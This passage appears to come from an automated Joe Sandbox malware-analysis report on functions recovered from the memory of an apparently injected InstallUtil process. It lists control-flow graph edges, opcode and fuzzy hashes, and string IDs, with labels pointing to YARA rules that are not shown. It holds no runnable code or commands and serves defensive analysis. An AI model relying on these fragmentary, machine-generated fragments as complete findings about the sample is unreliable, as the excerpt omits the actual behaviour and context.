                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q$Hbq
                                                                      • API String ID: 0-662517225
                                                                      • Opcode ID: 3ea49c955b7883e151d5bacff7d8c1e279842757fd5af4928044363c8b4f832c
                                                                      • Instruction ID: 79ffee6a95af2c6005647f4f1c8a76cf012e187726f9a9037e5b84f28fcbfd25
                                                                      • Opcode Fuzzy Hash: 3ea49c955b7883e151d5bacff7d8c1e279842757fd5af4928044363c8b4f832c
                                                                      • Instruction Fuzzy Hash: 6012AF70A102199FCB18DFA9C854BAEBBFAFF88304F148569E405DB399DB349D46CB50
                                                                      Function 022AB328 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2363 22ab328-22ab33b 2364 22ab47a-22ab481 2363->2364 2365 22ab341-22ab34a 2363->2365 2366 22ab350-22ab354 2365->2366 2367 22ab484 2365->2367 2368 22ab36e-22ab375 2366->2368 2369 22ab356 2366->2369 2371 22ab489-22ab48f 2367->2371 2368->2364 2370 22ab37b-22ab388 2368->2370 2372 22ab359-22ab364 2369->2372 2370->2364 2376 22ab38e-22ab3a1 2370->2376 2377 22ab490-22ab491 2371->2377 2372->2367 2373 22ab36a-22ab36c 2372->2373 2373->2368 2373->2372 2378 22ab3a3 2376->2378 2379 22ab3a6-22ab3ae 2376->2379 2380 22ab428 2377->2380 2381 22ab493-22ab4b0 2377->2381 2378->2379 2384 22ab41b-22ab41d 2379->2384 2385 22ab3b0-22ab3b6 2379->2385 2386 22ab42a-22ab431 2380->2386 2387 22ab3dd-22ab3e4 2380->2387 2382 22ab4dc 2381->2382 2383 22ab4b2-22ab4ca 2381->2383 2390 22ab4de-22ab4e2 2382->2390 2403 22ab4cc-22ab4d1 2383->2403 2404 22ab4d3-22ab4d6 2383->2404 2384->2364 2389 22ab41f-22ab425 2384->2389 2385->2384 2391 22ab3b8-22ab3be 2385->2391 2386->2371 2392 22ab432-22ab44b 2386->2392 2387->2371 2388 22ab3e5-22ab3fe 2387->2388 2388->2371 2398 22ab404 2388->2398 2389->2364 2394 22ab427 2389->2394 2391->2371 2395 22ab3c4-22ab3dc 2391->2395 2405 22ab44d-22ab453 2392->2405 2406 22ab470-22ab473 2392->2406 2394->2380 2395->2387 2402 22ab409-22ab40c 2395->2402 2398->2402 2402->2367 2407 22ab40e-22ab411 2402->2407 2403->2390 2408 22ab4d8-22ab4da 2404->2408 2409 22ab4e3-22ab4f9 2404->2409 2405->2371 2411 22ab455-22ab469 2405->2411 2406->2367 2413 22ab475-22ab478 2406->2413 2407->2367 2412 22ab413-22ab419 2407->2412 2408->2382 2408->2383 2409->2377 2416 22ab4fb-22ab520 2409->2416 2411->2371 2417 22ab46b 2411->2417 2412->2384 2412->2385 2413->2364 2413->2394 2418 22ab522 2416->2418 2419 22ab527-22ab604 call 22a3908 call 22a3428 2416->2419 2417->2406 2418->2419 2429 22ab60b-22ab62c call 22a4dc8 2419->2429 2430 22ab606 2419->2430 2432 22ab631-22ab63c 2429->2432 2430->2429 2433 22ab63e 2432->2433 2434 22ab643-22ab647 2432->2434 2433->2434 2435 22ab649-22ab64a 2434->2435 2436 22ab64c-22ab653 2434->2436 2437 22ab66b-22ab6af 2435->2437 2438 22ab65a-22ab668 2436->2438 2439 22ab655 2436->2439 2443 22ab715-22ab72c 2437->2443 2438->2437 2439->2438 2445 22ab72e-22ab753 2443->2445 2446 22ab6b1-22ab6c7 2443->2446 2452 22ab76b 2445->2452 2453 22ab755-22ab76a 2445->2453 2450 22ab6c9-22ab6d5 2446->2450 2451 22ab6f1 2446->2451 2454 22ab6df-22ab6e5 2450->2454 2455 22ab6d7-22ab6dd 2450->2455 2456 22ab6f7-22ab714 2451->2456 2459 22ab76c 2452->2459 2453->2452 2457 22ab6ef 2454->2457 2455->2457 2456->2443 2457->2456 2459->2459
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 946dc49c2749b2e42c8049ab4aae9e33d325c5ede9f749afb7e46a0e7c0e2f2a
                                                                      • Instruction ID: 14f4695790ded6926ed168c9ae33a3ecf34f23d137866f12f1c51bedb3c00cc9
                                                                      • Opcode Fuzzy Hash: 946dc49c2749b2e42c8049ab4aae9e33d325c5ede9f749afb7e46a0e7c0e2f2a
                                                                      • Instruction Fuzzy Hash: C8F13A75E10259CFDB14CFA9C8A4A9DBBB2FF58304F158069E809AB766DB30A841CF50
                                                                      Function 022ABEB0 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2760 22abeb0-22abeb1 2761 22abe48-22abe49 2760->2761 2762 22abeb3-22abeb5 2760->2762 2763 22abe4c 2761->2763 2762->2763 2764 22abeb7-22abeb9 2762->2764 2763->2763 2765 22abebb-22abee0 2764->2765 2766 22abe50-22abea2 2764->2766 2768 22abee2 2765->2768 2769 22abee7-22abfc4 call 22a3908 call 22a3428 2765->2769 2768->2769 2779 22abfcb-22abfec call 22a4dc8 2769->2779 2780 22abfc6 2769->2780 2782 22abff1-22abffc 2779->2782 2780->2779 2783 22abffe 2782->2783 2784 22ac003-22ac007 2782->2784 2783->2784 2785 22ac009-22ac00a 2784->2785 2786 22ac00c-22ac013 2784->2786 2787 22ac02b-22ac06f 2785->2787 2788 22ac01a-22ac028 2786->2788 2789 22ac015 2786->2789 2793 22ac0d5-22ac0ec 2787->2793 2788->2787 2789->2788 2795 22ac0ee-22ac113 2793->2795 2796 22ac071-22ac087 2793->2796 2805 22ac12b-22ac182 2795->2805 2806 22ac115-22ac12a 2795->2806 2800 22ac089-22ac095 2796->2800 2801 22ac0b1 2796->2801 2802 22ac09f-22ac0a5 2800->2802 2803 22ac097-22ac09d 2800->2803 2804 22ac0b7-22ac0d4 2801->2804 2807 22ac0af 2802->2807 2803->2807 2804->2793 2806->2805 2807->2804
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 022906212c42a159d9e7182c6414a103ed4f77dd08a75b5b61afdbadde639297
                                                                      • Instruction ID: b7d9217040183ba44fabd9bf0e64bc72c8ebbf03e6497c118006cf4bf9f4dffc
                                                                      • Opcode Fuzzy Hash: 022906212c42a159d9e7182c6414a103ed4f77dd08a75b5b61afdbadde639297
                                                                      • Instruction Fuzzy Hash: 2F91C574E10208CFDB14DFAAD994A9DFBF2BF89304F14806AE419AB769DB315985CF10
                                                                      Function 022ABBD2 Relevance: 2.7, Strings: 2, Instructions: 198COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2814 22abbd2-22abbd5 2815 22abb6c-22abb6f 2814->2815 2816 22abbd7-22abbd9 2814->2816 2820 22abbbd-22abbc8 2815->2820 2818 22abbdb-22abc00 2816->2818 2819 22abb70-22abb73 2816->2819 2822 22abc02 2818->2822 2823 22abc07-22abce4 call 22a3908 call 22a3428 2818->2823 2819->2820 2822->2823 2833 22abceb-22abd0c call 22a4dc8 2823->2833 2834 22abce6 2823->2834 2836 22abd11-22abd1c 2833->2836 2834->2833 2837 22abd1e 2836->2837 2838 22abd23-22abd27 2836->2838 2837->2838 2839 22abd29-22abd2a 2838->2839 2840 22abd2c-22abd33 2838->2840 2841 22abd4b-22abd8f 2839->2841 2842 22abd3a-22abd48 2840->2842 2843 22abd35 2840->2843 2847 22abdf5-22abe0c 2841->2847 2842->2841 2843->2842 2849 22abe0e-22abe33 2847->2849 2850 22abd91-22abda7 2847->2850 2859 22abe4b 2849->2859 2860 22abe35-22abe4a 2849->2860 2854 22abda9-22abdb5 2850->2854 2855 22abdd1 2850->2855 2856 22abdbf-22abdc5 2854->2856 2857 22abdb7-22abdbd 2854->2857 2858 22abdd7-22abdf4 2855->2858 2861 22abdcf 2856->2861 2857->2861 2858->2847 2862 22abe4c 2859->2862 2860->2859 2861->2858 2862->2862
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 04ab0f4f2aac1a7dd9e8c28fffe67c7809f3f1e777d04d44aa723318d28886ee
                                                                      • Instruction ID: ce423f7a1796dc0d6ae922aad93b9736354ff2bd892d46ac5767e4d89f89977a
                                                                      • Opcode Fuzzy Hash: 04ab0f4f2aac1a7dd9e8c28fffe67c7809f3f1e777d04d44aa723318d28886ee
                                                                      • Instruction Fuzzy Hash: FE91D374E10218CFDB14DFAAD894A9DBBF2FF89304F108469E819AB769DB709945CF10
                                                                      Function 022AC190 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2866 22ac190-22ac195 2867 22ac12c 2866->2867 2868 22ac197-22ac199 2866->2868 2870 22ac130-22ac182 2867->2870 2869 22ac19b-22ac1c0 2868->2869 2868->2870 2872 22ac1c2 2869->2872 2873 22ac1c7-22ac2a4 call 22a3908 call 22a3428 2869->2873 2872->2873 2883 22ac2ab-22ac2cc call 22a4dc8 2873->2883 2884 22ac2a6 2873->2884 2886 22ac2d1-22ac2dc 2883->2886 2884->2883 2887 22ac2de 2886->2887 2888 22ac2e3-22ac2e7 2886->2888 2887->2888 2889 22ac2e9-22ac2ea 2888->2889 2890 22ac2ec-22ac2f3 2888->2890 2891 22ac30b-22ac34f 2889->2891 2892 22ac2fa-22ac308 2890->2892 2893 22ac2f5 2890->2893 2897 22ac3b5-22ac3cc 2891->2897 2892->2891 2893->2892 2899 22ac3ce-22ac3f3 2897->2899 2900 22ac351-22ac367 2897->2900 2907 22ac40b 2899->2907 2908 22ac3f5-22ac40a 2899->2908 2904 22ac369-22ac375 2900->2904 2905 22ac391 2900->2905 2909 22ac37f-22ac385 2904->2909 2910 22ac377-22ac37d 2904->2910 2906 22ac397-22ac3b4 2905->2906 2906->2897 2908->2907 2911 22ac38f 2909->2911 2910->2911 2911->2906
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: b328d65af04b8042ad270383bab31ac864f55d667842a853a10f7f514236707b
                                                                      • Instruction ID: 8d9b29b55b8fe0e3fa9b2efba7d2299bb3c225539890e34107af3d217b2bec7e
                                                                      • Opcode Fuzzy Hash: b328d65af04b8042ad270383bab31ac864f55d667842a853a10f7f514236707b
                                                                      • Instruction Fuzzy Hash: 4491C674E10208CFDB14DFAAD994A9DBBF2BF89300F14C06AE419AB365DB709945CF50
                                                                      Function 022AB4F2 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2915 22ab4f2-22ab4f5 2916 22ab48c-22ab491 2915->2916 2917 22ab4f7-22ab4f9 2915->2917 2920 22ab428 2916->2920 2921 22ab493-22ab4b0 2916->2921 2918 22ab4fb-22ab520 2917->2918 2919 22ab490-22ab491 2917->2919 2926 22ab522 2918->2926 2927 22ab527-22ab604 call 22a3908 call 22a3428 2918->2927 2919->2920 2919->2921 2924 22ab42a-22ab431 2920->2924 2925 22ab3dd-22ab3e4 2920->2925 2922 22ab4dc 2921->2922 2923 22ab4b2-22ab4ca 2921->2923 2930 22ab4de-22ab4e2 2922->2930 2942 22ab4cc-22ab4d1 2923->2942 2943 22ab4d3-22ab4d6 2923->2943 2928 22ab489-22ab48f 2924->2928 2931 22ab432-22ab44b 2924->2931 2925->2928 2929 22ab3e5-22ab3fe 2925->2929 2926->2927 2972 22ab60b-22ab62c call 22a4dc8 2927->2972 2973 22ab606 2927->2973 2928->2919 2929->2928 2937 22ab404 2929->2937 2945 22ab44d-22ab453 2931->2945 2946 22ab470-22ab473 2931->2946 2941 22ab409-22ab40c 2937->2941 2947 22ab40e-22ab411 2941->2947 2948 22ab484 2941->2948 2942->2930 2950 22ab4d8-22ab4da 2943->2950 2951 22ab4e3-22ab4f9 2943->2951 2945->2928 2952 22ab455-22ab469 2945->2952 2946->2948 2954 22ab475-22ab478 2946->2954 2947->2948 2953 22ab413-22ab419 2947->2953 2948->2928 2950->2922 2950->2923 2951->2918 2951->2919 2952->2928 2965 22ab46b 2952->2965 2956 22ab41b-22ab41d 2953->2956 2957 22ab3b0-22ab3b6 2953->2957 2958 22ab47a-22ab481 2954->2958 2959 22ab427 2954->2959 2956->2958 2963 22ab41f-22ab425 2956->2963 2957->2956 2964 22ab3b8-22ab3be 2957->2964 2959->2920 2963->2958 2963->2959 2964->2928 2966 22ab3c4-22ab3dc 2964->2966 2965->2946 2966->2925 2966->2941 2975 22ab631-22ab63c 2972->2975 2973->2972 2976 22ab63e 2975->2976 2977 22ab643-22ab647 2975->2977 2976->2977 2978 22ab649-22ab64a 2977->2978 2979 22ab64c-22ab653 2977->2979 2980 22ab66b-22ab6af 2978->2980 2981 22ab65a-22ab668 2979->2981 2982 22ab655 2979->2982 2986 22ab715-22ab72c 2980->2986 2981->2980 2982->2981 2988 22ab72e-22ab753 2986->2988 2989 22ab6b1-22ab6c7 2986->2989 2995 22ab76b 2988->2995 2996 22ab755-22ab76a 2988->2996 2993 22ab6c9-22ab6d5 2989->2993 2994 22ab6f1 2989->2994 2997 22ab6df-22ab6e5 2993->2997 2998 22ab6d7-22ab6dd 2993->2998 2999 22ab6f7-22ab714 2994->2999 3002 22ab76c 2995->3002 2996->2995 3000 22ab6ef 2997->3000 2998->3000 2999->2986 3000->2999 3002->3002
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: b8047758321cd535fb55c66cc22159973d564b73a8e2abdadf247d8318b66661
                                                                      • Instruction ID: fd13b5bdfb78f31c6c9fb883121ce626c096dd1b11b5bcdf4c4a6415b7085736
                                                                      • Opcode Fuzzy Hash: b8047758321cd535fb55c66cc22159973d564b73a8e2abdadf247d8318b66661
                                                                      • Instruction Fuzzy Hash: C4810874E142089FDB14CFAAD894A9DBBF2FF89304F14C069E404AB369DB709946CF50
                                                                      Function 022AC470 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 3005 22ac470-22ac4a0 3006 22ac4a2 3005->3006 3007 22ac4a7-22ac584 call 22a3908 call 22a3428 3005->3007 3006->3007 3017 22ac58b-22ac5ac call 22a4dc8 3007->3017 3018 22ac586 3007->3018 3020 22ac5b1-22ac5bc 3017->3020 3018->3017 3021 22ac5be 3020->3021 3022 22ac5c3-22ac5c7 3020->3022 3021->3022 3023 22ac5c9-22ac5ca 3022->3023 3024 22ac5cc-22ac5d3 3022->3024 3025 22ac5eb-22ac62f 3023->3025 3026 22ac5da-22ac5e8 3024->3026 3027 22ac5d5 3024->3027 3031 22ac695-22ac6ac 3025->3031 3026->3025 3027->3026 3033 22ac6ae-22ac6d3 3031->3033 3034 22ac631-22ac647 3031->3034 3043 22ac6eb 3033->3043 3044 22ac6d5-22ac6ea 3033->3044 3038 22ac649-22ac655 3034->3038 3039 22ac671 3034->3039 3040 22ac65f-22ac665 3038->3040 3041 22ac657-22ac65d 3038->3041 3042 22ac677-22ac694 3039->3042 3045 22ac66f 3040->3045 3041->3045 3042->3031 3044->3043 3045->3042
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: f82f0c6b85d34833ccdcd5403a01dcb591d2515c191810c5d3b07b4e7e74c3b1
                                                                      • Instruction ID: 45cbf1488667342792777d2b80b6c760cd7541912ea71418fc90abe082d154e5
                                                                      • Opcode Fuzzy Hash: f82f0c6b85d34833ccdcd5403a01dcb591d2515c191810c5d3b07b4e7e74c3b1
                                                                      • Instruction Fuzzy Hash: B981C574E10218CFDB18DFAAD894A9DBBF2BF89300F14D06AE419AB365DB709945CF10
                                                                      Function 022AC751 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 657b6ccfa22459b60636c29733f6cd9747da8cc07554b774d13b825be13349a8
                                                                      • Instruction ID: 2a7ce6686fffdfcd7e7ca12fffb254fec9d4ce67b90d1c724a0e02e7dcc93269
                                                                      • Opcode Fuzzy Hash: 657b6ccfa22459b60636c29733f6cd9747da8cc07554b774d13b825be13349a8
                                                                      • Instruction Fuzzy Hash: 1181B374E10219CFDB54DFAAD994A9DBBF2BF89300F14C06AE419AB365DB309945CF10
                                                                      Function 022ACA31 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 2fc79fef3d953771b26762c8c3195e5aed978f5c8975b866bd9366a827aee60e
                                                                      • Instruction ID: 5df8d317eb880e6c6aaa62f108463d53bb69eb62cc90bc58b899fa99204ffc02
                                                                      • Opcode Fuzzy Hash: 2fc79fef3d953771b26762c8c3195e5aed978f5c8975b866bd9366a827aee60e
                                                                      • Instruction Fuzzy Hash: A681B374E11218CFDB14DFAAD994A9DBBF2BF88300F14C46AE819AB365DB319945CF10
                                                                      Function 022A4AD9 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 5db12d1d0c429d613cf0b33f264e93c531cb9b66fb3a4ed6c389f262c1dc8256
                                                                      • Instruction ID: cac36f2a4deb3643edb4ccf6eb14ae7e319f08974e8b96596e4e0ee86c6aea42
                                                                      • Opcode Fuzzy Hash: 5db12d1d0c429d613cf0b33f264e93c531cb9b66fb3a4ed6c389f262c1dc8256
                                                                      • Instruction Fuzzy Hash: 8C819474E10218CFDB14DFAAD994A9DBBF2BF89300F14C469E819AB365DB709945CF10
                                                                      Function 04B17B70 Relevance: 2.0, APIs: 1, Instructions: 532COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4155663119.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_4b10000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 31e7387c8da92b6b8350e45f36d559e7dd57c3fcda29cf4fb2f021debab07229
                                                                      • Instruction ID: 8835032ae43ed427a641b384e311031db6c894fd3d7a72f04f95a6a4c607b67d
                                                                      • Opcode Fuzzy Hash: 31e7387c8da92b6b8350e45f36d559e7dd57c3fcda29cf4fb2f021debab07229
                                                                      • Instruction Fuzzy Hash: 4D223C74E01218CFCB14DFA9D984B9DBBB2BF88300F5085A9E409AB365DB34AD85CF50
                                                                      Function 022AF007 Relevance: .7, Instructions: 720COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 652cffcc34f4bf91cba16e2bf88fb565b5747bf727a818f3676864473dba2fc0
                                                                      • Instruction ID: 8edc78932afc41634fb3205f2a01105945762445ddb2ff6d71d0353619d6ce65
                                                                      • Opcode Fuzzy Hash: 652cffcc34f4bf91cba16e2bf88fb565b5747bf727a818f3676864473dba2fc0
                                                                      • Instruction Fuzzy Hash: 2D72FF74E012298FDB64DF69C990BDDBBB2BB49300F1095EAD408AB759DB359E81CF40
                                                                      Function 022A6E58 Relevance: 10.5, Strings: 8, Instructions: 478COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 22a6e58-22a6e8d 1 22a72bc-22a72c0 0->1 2 22a6e93-22a6eb6 0->2 3 22a72d9-22a72e7 1->3 4 22a72c2-22a72d6 1->4 11 22a6ebc-22a6ec9 2->11 12 22a6f64-22a6f68 2->12 9 22a7358-22a736d 3->9 10 22a72e9-22a72fe 3->10 20 22a736f-22a7372 9->20 21 22a7374-22a7381 9->21 22 22a7300-22a7303 10->22 23 22a7305-22a7312 10->23 26 22a6ecb-22a6ed6 11->26 27 22a6ed8 11->27 13 22a6f6a-22a6f78 12->13 14 22a6fb0-22a6fb9 12->14 13->14 35 22a6f7a-22a6f95 13->35 17 22a73cf 14->17 18 22a6fbf-22a6fc9 14->18 36 22a73d4-22a7404 17->36 18->1 24 22a6fcf-22a6fd8 18->24 28 22a7383-22a73be 20->28 21->28 29 22a7314-22a7355 22->29 23->29 33 22a6fda-22a6fdf 24->33 34 22a6fe7-22a6ff3 24->34 30 22a6eda-22a6edc 26->30 27->30 77 22a73c5-22a73cc 28->77 30->12 37 22a6ee2-22a6f44 30->37 33->34 34->36 40 22a6ff9-22a6fff 34->40 60 22a6fa3 35->60 61 22a6f97-22a6fa1 35->61 53 22a741d-22a7424 36->53 54 22a7406-22a741c 36->54 88 22a6f4a-22a6f61 37->88 89 22a6f46 37->89 43 22a72a6-22a72aa 40->43 44 22a7005-22a7015 40->44 43->17 48 22a72b0-22a72b6 43->48 58 22a7029-22a702b 44->58 59 22a7017-22a7027 44->59 48->1 48->24 63 22a702e-22a7034 58->63 59->63 64 22a6fa5-22a6fa7 60->64 61->64 63->43 65 22a703a-22a7049 63->65 64->14 66 22a6fa9 64->66 72 22a704f 65->72 73 22a70f7-22a7122 call 22a6ca0 * 2 65->73 66->14 75 22a7052-22a7063 72->75 90 22a7128-22a712c 73->90 91 22a720c-22a7226 73->91 75->36 79 22a7069-22a707b 75->79 79->36 81 22a7081-22a7099 79->81 144 22a709b call 22a7428 81->144 145 22a709b call 22a7438 81->145 84 22a70a1-22a70b1 84->43 87 22a70b7-22a70ba 84->87 92 22a70bc-22a70c2 87->92 93 22a70c4-22a70c7 87->93 88->12 89->88 90->43 95 22a7132-22a7136 90->95 91->1 113 22a722c-22a7230 91->113 92->93 96 22a70cd-22a70d0 92->96 93->17 93->96 98 22a7138-22a7145 95->98 99 22a715e-22a7164 95->99 100 22a70d8-22a70db 96->100 101 22a70d2-22a70d6 96->101 116 22a7147-22a7152 98->116 117 22a7154 98->117 102 22a719f-22a71a5 99->102 103 22a7166-22a716a 99->103 100->17 104 22a70e1-22a70e5 100->104 101->100 101->104 106 22a71b1-22a71b7 102->106 107 22a71a7-22a71ab 102->107 103->102 105 22a716c-22a7175 103->105 104->17 110 22a70eb-22a70f1 104->110 111 22a7177-22a717c 105->111 112 22a7184-22a719a 105->112 114 22a71b9-22a71bd 106->114 115 22a71c3-22a71c5 106->115 107->77 107->106 110->73 110->75 111->112 112->43 118 22a726c-22a7270 113->118 119 22a7232-22a723c call 22a5b50 113->119 114->43 114->115 120 22a71fa-22a71fc 115->120 121 22a71c7-22a71d0 115->121 122 22a7156-22a7158 116->122 117->122 118->77 125 22a7276-22a727a 118->125 119->118 133 22a723e-22a7253 119->133 120->43 123 22a7202-22a7209 120->123 128 22a71df-22a71f5 121->128 129 22a71d2-22a71d7 121->129 122->43 122->99 125->77 130 22a7280-22a728d 125->130 128->43 129->128 136 22a728f-22a729a 130->136 137 22a729c 130->137 133->118 141 22a7255-22a726a 133->141 138 22a729e-22a72a0 136->138 137->138 138->43 138->77 141->1 141->118 144->84 145->84
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                      • API String ID: 0-1932283790
                                                                      • Opcode ID: fbf1e54aae9101dccfa4aa8079498381e0427d66f362be969bef266c948b51a8
                                                                      • Instruction ID: b022f522a753b40c9fc4b5485008351ed71ba3a61c2c8ec5e741a4beb9335f9e
                                                                      • Opcode Fuzzy Hash: fbf1e54aae9101dccfa4aa8079498381e0427d66f362be969bef266c948b51a8
                                                                      • Instruction Fuzzy Hash: F2127A31A102098FCB14CFA8C994AAEBBF2FF88314F1585A9E815DB765DB30ED45CB54
                                                                      Function 022A215C Relevance: 5.3, Strings: 4, Instructions: 321COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 608 22a215c-22a2166 610 22a2168-22a217b 608->610 611 22a20f1-22a2109 608->611 614 22a21ec-22a221c 610->614 615 22a217d-22a21ab 610->615 616 22a2110-22a2138 611->616 620 22a221e-22a2225 614->620 621 22a2237-22a223f 614->621 622 22a21cd-22a21eb 615->622 623 22a21ad-22a21cc 615->623 624 22a222e-22a2235 620->624 625 22a2227-22a222c 620->625 626 22a2242-22a2256 621->626 622->614 624->626 625->626 631 22a2258-22a225f 626->631 632 22a226c-22a2274 626->632 633 22a2261-22a2263 631->633 634 22a2265-22a226a 631->634 636 22a2276-22a227a 632->636 633->636 634->636 637 22a22da-22a22dd 636->637 638 22a227c-22a2291 636->638 639 22a22df-22a22f4 637->639 640 22a2325-22a232b 637->640 638->637 645 22a2293-22a2296 638->645 639->640 647 22a22f6-22a22fa 639->647 642 22a2331-22a2333 640->642 643 22a2e26 640->643 642->643 646 22a2339-22a233e 642->646 650 22a2e2b-22a2f52 643->650 648 22a2298-22a229a 645->648 649 22a22b5-22a22d3 call 22a02c8 645->649 651 22a2dd4-22a2dd8 646->651 652 22a2344 646->652 655 22a22fc-22a2300 647->655 656 22a2302-22a2320 call 22a02c8 647->656 648->649 657 22a229c-22a229f 648->657 649->637 653 22a2dda-22a2ddd 651->653 654 22a2ddf-22a2e25 651->654 652->651 653->650 653->654 655->640 655->656 656->640 657->637 660 22a22a1-22a22b3 657->660 660->637 660->649
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
